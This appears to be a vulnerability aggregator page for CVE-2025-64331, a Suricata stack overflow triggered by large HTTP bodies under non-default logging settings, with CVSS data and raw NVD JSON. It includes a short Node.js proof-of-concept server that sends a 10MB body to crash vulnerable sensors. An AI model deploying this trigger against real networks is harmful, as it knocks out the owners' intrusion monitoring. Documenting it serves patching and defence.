Security Vulnerability Report
CVE-2025-64331 CVSS 7.5 HIGH

CVE-2025-64331

Published: 2025-11-26 23:15:48
Last Modified: 2025-12-08 19:30:35

Description

Suricata is a network IDS, IPS and NSM engine developed by the OISF (Open Information Security Foundation) and the Suricata community. Prior to versions 7.0.13 and 8.0.2, a stack overflow can occur on large HTTP file transfers if the user has increased the HTTP response body limit and enabled the logging of printable http bodies. This issue has been patched in versions 7.0.13 and 8.0.2. A workaround for this issue involves using default HTTP response body limits and/or disabling http-body-printable logging; body logging is disabled by default.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:oisf:suricata:*:*:*:*:*:*:*:* (Suricata < 7.0.13) - VULNERABLE
cpe:2.3:a:oisf:suricata:*:*:*:*:*:*:*:* (Suricata >= 8.0.0, < 8.0.2) - VULNERABLE

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```javascript
// CVE-2025-64331 PoC - Suricata HTTP Body Stack Overflow
// Target: Suricata < 7.0.13 or < 8.0.2 with custom http.response.body-limit
// Author: Security Researcher
const http = require('http');

// Generate large payload with printable characters
function generateLargePayload(size) {
  return 'A'.repeat(size);
}

const server = http.createServer((req, res) => {
  // Send large HTTP response to trigger stack overflow
  // This PoC assumes Suricata is configured with:
  //   - http.response.body-limit: high value (e.g., 100mb)
  //   - http-body-printable: enabled
  const largePayload = generateLargePayload(10 * 1024 * 1024); // 10MB
  res.writeHead(200, {
    'Content-Type': 'text/html',
    'Content-Length': largePayload.length
  });
  res.end(largePayload);
});

server.listen(8080, '0.0.0.0', () => {
  console.log('Malicious HTTP server running on port 8080');
  console.log('Waiting for Suricata to connect and process large HTTP response...');
});

// Note: This PoC requires specific Suricata configuration to be vulnerable:
//   1. Set http.response.body-limit to a high value in suricata.yaml
//   2. Enable http-body-printable logging in eve-log config
// The default configuration is NOT vulnerable as body logging is disabled
```

References

https://github.com/OISF/suricata/security/advisories/GHSA-v32w-j79x-pfj2 (Third Party Advisory)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-64331",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-26T23:15:48.263",
    "lastModified": "2025-12-08T19:30:34.790",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Suricata is a network IDS, IPS and NSM engine developed by the OISF (Open Information Security Foundation) and the Suricata community. Prior to versions 7.0.13 and 8.0.2, a stack overflow can occur on large HTTP file transfers if the user has increased the HTTP response body limit and enabled the logging of printable http bodies. This issue has been patched in versions 7.0.13 and 8.0.2. A workaround for this issue involves using default HTTP response body limits and/or disabling http-body-printable logging; body logging is disabled by default."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-121"}]
      },
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [{"lang": "en", "value": "CWE-787"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:oisf:suricata:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "7.0.13",
                "matchCriteriaId": "AA4D86E3-44A3-4B0B-9CF4-9FC88091D3C1"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:oisf:suricata:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "8.0.0",
                "versionEndExcluding": "8.0.2",
                "matchCriteriaId": "C93A731C-19AD-4067-B28C-17164C2D981D"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/OISF/suricata/security/advisories/GHSA-v32w-j79x-pfj2",
        "source": "[email protected]",
        "tags": ["Third Party Advisory"]
      }
    ]
  }
}
```